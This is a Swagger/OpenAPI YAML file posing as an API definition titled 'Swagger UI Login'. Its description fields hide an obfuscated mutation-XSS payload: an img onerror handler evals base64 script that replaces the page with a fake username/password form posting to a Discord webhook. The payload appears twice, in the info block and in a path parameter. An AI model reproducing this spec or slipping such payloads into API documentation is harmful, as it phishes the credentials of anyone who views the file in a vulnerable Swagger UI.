swagger: '2.0'
info:
  title: Swagger UI Login
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=x id='YnRvYShgZG9jdW1lbnQuYm9keS5pbm5lckhUTUw9Jyc7dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnZm9ybScpO2EuYWN0aW9uPSJodHRwczovL2Rpc2NvcmQuY29tL2FwaS93ZWJob29rcy8xMzkxNjgyOTY0MDk3NzMyNjY4L3B3RUtJTTdJVkxaWm5zVWFyT29rajFqUEtyd0Z1UHpyZzBkbElLSXhzV0wxUHhNbEZkUUFVaDJ2UXpaY2JSVGUxbEQzIjthLm1ldGhvZD0nUE9TVCc7YS5pbm5lckhUTUw9JzxjZW50ZXI+VXNlcm5hbWU6IDxpbnB1dCBuYW1lPSJ1c2VybmFtZSI+PGJyPlBhc3N3b3JkOiA8aW5wdXQgbmFtZT0icGFzc3dvcmQiIHR5cGU9InBhc3N3b3JkIj48YnI+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj48L2NlbnRlcj4nO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7YCkK' onerror='eval(atob(this.id))'>">
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /M0X0101:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - M4ST3R MIND
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img src=x id='YnRvYShgZG9jdW1lbnQuYm9keS5pbm5lckhUTUw9Jyc7dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnZm9ybScpO2EuYWN0aW9uPSJodHRwczovL2Rpc2NvcmQuY29tL2FwaS93ZWJob29rcy8xMzkxNjgyOTY0MDk3NzMyNjY4L3B3RUtJTTdJVkxaWm5zVWFyT29rajFqUEtyd0Z1UHpyZzBkbElLSXhzV0wxUHhNbEZkUUFVaDJ2UXpaY2JSVGUxbEQzIjthLm1ldGhvZD0nUE9TVCc7YS5pbm5lckhUTUw9JzxjZW50ZXI+VXNlcm5hbWU6IDxpbnB1dCBuYW1lPSJ1c2VybmFtZSI+PGJyPlBhc3N3b3JkOiA8aW5wdXQgbmFtZT0icGFzc3dvcmQiIHR5cGU9InBhc3N3b3JkIj48YnI+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj48L2NlbnRlcj4nO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7YCkK' onerror='eval(atob(this.id))'>">
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
